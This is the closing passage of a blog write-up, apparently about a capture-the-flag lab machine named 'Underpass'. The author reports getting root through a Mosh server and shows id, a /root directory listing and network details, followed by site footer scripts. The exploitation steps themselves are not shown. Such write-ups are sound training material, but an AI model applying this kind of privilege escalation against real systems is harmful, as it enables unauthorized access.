Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings



</span><span class="gp">root@underpass:~#</span><span class="w">
</span><span class="go">
</span></code></pre></div></div>
<p>Connecting to the Mosh server, I find that I am root on the machine!</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">root@underpass:~#</span><span class="w"> </span><span class="nb">id</span>
<span class="go">uid=0(root) gid=0(root) groups=0(root)
</span><span class="gp">root@underpass:~#</span><span class="w"> </span><span class="nb">ls</span> <span class="nt">-la</span>
<span class="go">total 44
drwx------  6 root root 4096 Jun 13 19:30 .
drwxr-xr-x 18 root root 4096 Dec 11  2024 ..
</span><span class="gp">lrwxrwxrwx  1 root root    9 Nov 30  2024 .bash_history -&gt;</span><span class="w"> </span>/dev/null
<span class="go">-rw-r--r--  1 root root 3106 Oct 15  2021 .bashrc
drwx------  2 root root 4096 Sep 22  2024 .cache
drwx------  3 root root 4096 Dec 11  2024 .config
-rw-------  1 root root   20 Dec 19 12:42 .lesshst
drwxr-xr-x  3 root root 4096 Dec 11  2024 .local
-rw-r--r--  1 root root  161 Jul  9  2019 .profile
-rw-r-----  1 root root   33 Jun 13 19:30 root.txt
drwx------  2 root root 4096 Dec 11  2024 .ssh
-rw-r--r--  1 root root  165 Dec 11  2024 .wget-hsts
</span><span class="gp">root@underpass:~#</span><span class="w"> </span><span class="nb">cat </span>root.txt |wc
<span class="go">      1       1      33
</span><span class="gp">root@underpass:~#</span><span class="w"> </span>ip a
<span class="gp">1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt;</span><span class="w"> </span>mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
<span class="go">    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
</span><span class="gp">2: eth0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt;</span><span class="w"> </span>mtu 1500 qdisc mq state UP group default qlen 1000
<span class="go">    link/ether 00:50:56:b0:be:23 brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    altname ens160
    inet 10.10.11.48/23 brd 10.10.11.255 scope global eth0
       valid_lft forever preferred_lft forever
</span><span class="gp">root@underpass:~#</span><span class="w">
</span><span class="go">
</span></code></pre></div></div>

  </article>


  
    
    <br>
    <hr>
    <br>
    <ul class="list-disc pl-8"></ul>

    <!-- Adds related posts to the end of an article -->
    <h2 class="text-3xl font-semibold mb-4 mt-12">Enjoy Reading This Article?</h2>
    <p class="mb-2">Here are some more articles you might like to read next:</p>
  

  <li class="my-2">
    <a class="text-pink-700 underline font-semibold hover:text-pink-800" href="/blog/2023/soccer/">Soccer</a>
  </li>

  

  <li class="my-2">
    <a class="text-pink-700 underline font-semibold hover:text-pink-800" href="/blog/2023/metatwo/">MetaTwo</a>
  </li>

</div>

    </div>

    <!-- Footer -->    
    <footer class="fixed-bottom">
      <div class="container mt-0">
        © Copyright 2025 Will  Lindsey. Powered by <a href="https://jekyllrb.com/" target="_blank" rel="external nofollow noopener">Jekyll</a> with <a href="https://github.com/alshedivat/al-folio" rel="external nofollow noopener" target="_blank">al-folio</a> theme. Hosted by <a href="https://pages.github.com/" target="_blank" rel="external nofollow noopener">GitHub Pages</a>.

      </div>
    </footer>

    <!-- JavaScripts -->
    <!-- jQuery -->
  <script src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>

    <!-- Bootsrap & MDB scripts -->
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/js/bootstrap.bundle.min.js" integrity="sha256-fgLAgv7fyCGopR/gBNq2iW3ZKIdqIcyshnUULC4vex8=" crossorigin="anonymous"></script>
  <script src="https://cdn.jsdelivr.net/npm/mdbootstrap@4.20.0/js/mdb.min.js" integrity="sha256-NdbiivsvWt7VYCt6hYNT3h/th9vSTL4EDWeGs5SN3DA=" crossorigin="anonymous"></script>

    <!-- Masonry & imagesLoaded -->
  <script defer src="https://cdn.jsdelivr.net/npm/masonry-layout@4.2.2/dist/masonry.pkgd.min.js" integrity="sha256-Nn1q/fx0H7SNLZMQ5Hw5JLaTRZp0yILA/FRexe19VdI=" crossorigin="anonymous"></script>
  <script defer src="https://cdn.jsdelivr.net/npm/imagesloaded@4/imagesloaded.pkgd.min.js"></script>
  <script defer src="/assets/js/masonry.js" type="text/javascript"></script>
    
  <!-- Medium Zoom JS -->
  <script defer src="https://cdn.jsdelivr.net/npm/medium-zoom@1.0.8/dist/medium-zoom.min.js" integrity="sha256-7PhEpEWEW0XXQ0k6kQrPKwuoIomz8R8IYyuU1Qew4P8=" crossorigin="anonymous"></script>
  <script defer src="/assets/js/zoom.js"></script><!-- Load Common JS -->
  <script defer src="/assets/js/common.js"></script>
  <script defer src="/assets/js/copy_code.js" type="text/javascript"></script>

    
  <script async src="https://d1bxh8uas1mnw7.cloudfront.net/assets/embed.js"></script>
  <script async src="https://badge.dimensions.ai/badge.js"></script>

    <!-- MathJax -->
  <script type="text/javascript">
    window.MathJax = {
      tex: {
        tags: 'ams'
      }
    };
  </script>
  <script defer type="text/javascript" id="MathJax-script" src="https://cdn.jsdelivr.net/npm/mathjax@3.2.0/es5/tex-mml-chtml.js"></script>
  <script defer src="https://polyfill.io/v3/polyfill.min.js?features=es6"></script>

    
    

<!-- Scrolling Progress Bar -->
<script type="text/javascript">
  /*
   * This JavaScript code has been adapted from the article 
   * https://css-tricks.com/reading-position-indicator/ authored by Pankaj Parashar, 
   * published on the website https://css-tricks.com on the 7th of May, 2014.
   * Couple of changes were made to the original code to make it compatible 
   * with the `al-foio` theme.
   */
  const progressBar = $("#progress");
  /*
   * We set up the bar after all elements are done loading.
   * In some cases, if the images in the page are larger than the intended
   * size they'll have on the page, they'll be resized via CSS to accomodate
   * the desired size. This mistake, however, breaks the computations as the
   * scroll size is computed as soon as the elements finish loading.
   * To account for this, a minimal delay was introduced before computing the
   * values.
   */
  window.onload = function () {
    setTimeout(progressBarSetup, 50);
  };
  /*
   * We set up the bar according to the browser.
   * If the browser supports the progress element we use that.
   * Otherwise, we resize the bar thru CSS styling
   */
  function progressBarSetup() {
    if ("max" in document.createElement("progress")) {
      initializeProgressElement();
      $(document).on("scroll", function() {
        progressBar.attr({ value: getCurrentScrollPosition() });
      });
      $(window).on("resize", initializeProgressElement);
    } else {
      resizeProgressBar();
      $(document).on("scroll", resizeProgressBar);
      $(window).on("resize", resizeProgressBar);
    }
  }
  /*
   * The vertical scroll position is the same as the number of pixels that
   * are hidden from view above the scrollable area. Thus, a value > 0 is
   * how much the user has scrolled from the top
   */
  function getCurrentScrollPosition() {
    return $(window).scrollTop();
  }

  function initializeProgressElement() {
    let navbarHeight = $("#navbar").outerHeight(true);
    $("body").css({ "padding-top": navbarHeight });
    $("progress-container").css({ "padding-top": navbarHeight });
    progressBar.css({ top: navbarHeight });
    progressBar.attr({
      max: getDistanceToScroll(),
      value: getCurrentScrollPosition(),
    });
  }
  /*
   * The offset between the html document height and the browser viewport
   * height will be greater than zero if vertical scroll is possible.
   * This is the distance the user can scroll
   */
  function getDistanceToScroll() {
    return $(document).height() - $(window).height();
  }

  function resizeProgressBar() {
    progressBar.css({ width: getWidthPercentage() + "%" });
  }
  // The scroll ratio equals the percentage to resize the bar
  function getWidthPercentage() {
    return (getCurrentScrollPosition() / getDistanceToScroll()) * 100;
  }
</script>

  </body>
</html>
